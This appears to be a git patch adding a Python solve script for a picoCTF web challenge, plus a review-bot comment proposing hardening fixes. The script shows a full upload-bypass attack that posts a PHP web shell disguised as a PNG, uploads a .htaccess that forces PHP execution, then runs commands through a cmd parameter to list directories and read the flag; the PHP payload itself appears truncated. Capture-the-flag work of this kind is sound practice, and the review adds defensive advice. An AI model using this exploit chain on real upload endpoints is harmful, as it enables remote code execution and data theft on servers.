From fd6ac3400f55187d410adfc32c35a69126d91fcf Mon Sep 17 00:00:00 2001
From: h7x4
Date: Sun, 5 Jul 2026 08:04:10 +0900
Subject: [PATCH] web/byp4ss3d
---
web/byp4ss3d/solve.py | 57 +++++++++++++++++++++++++++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100755 web/byp4ss3d/solve.py
diff --git a/web/byp4ss3d/solve.py b/web/byp4ss3d/solve.py
new file mode 100755
index 0000000..2a2fbd0
--- /dev/null
+++ b/web/byp4ss3d/solve.py
@@ -0,0 +1,57 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ requests ])"
+
+import requests
+
+BASE_URL = "http://amiable-citadel.picoctf.net:53954"
+
+def main():
+ payload = b'''
+ &1');
+ ?>
+ '''
+
+ res = requests.post(
+ BASE_URL + "/upload.php",
+ files = {
+ 'image': ('exploit.png', payload, 'image/png'),
+ 'submit': 'Upload ID',
+ }
+ )
+
+ print(res)
+ print(res.text)
+
+ print('-------------------------------')
+
+ htaccess = b'SetHandler php-script'
+
+ res = requests.post(
+ BASE_URL + "/upload.php",
+ files = {
+ 'image': ('.htaccess', htaccess, 'text/plain'),
+ 'submit': 'Upload ID',
+ }
+ )
+
+ print(res)
+ print(res.text)
+
+ print('-------------------------------')
+
+ cmd = "ls -lah ../.."
+ res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
+ print(res)
+ print(res.text)
+
+ print('-------------------------------')
+
+ cmd = "cat ../../flag.txt"
+ res = requests.get(BASE_URL + f"/images/exploit.png?cmd={cmd}")
+ print(res)
+ print(res.text)
+
+
+if __name__ == '__main__':
+ main()
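Review bot: solve.py has no module docstring or comments saying which server behaviour each request relies on, so anyone reading this write-up to harden an upload endpoint has to infer it. From the visible calls, the script depends on `/upload.php` accepting a client-chosen filename (including `.htaccess`) and a client-declared `image/png` type, and on `/images/` being served with per-directory overrides honoured (inferred from the `SetHandler` upload, not shown here). I would add a short header docstring naming those three conditions and the matching fixes: server-generated filenames with an extension allow-list, validating content rather than trusting the declared type, and storing uploads outside the web root or with overrides and script handlers disabled. Separately, every `requests.post`/`requests.get` call lacks `timeout=` and the responses are printed without a status check, so an expired challenge instance hangs the script; `timeout=10` plus `res.raise_for_status()` would make failures explicit.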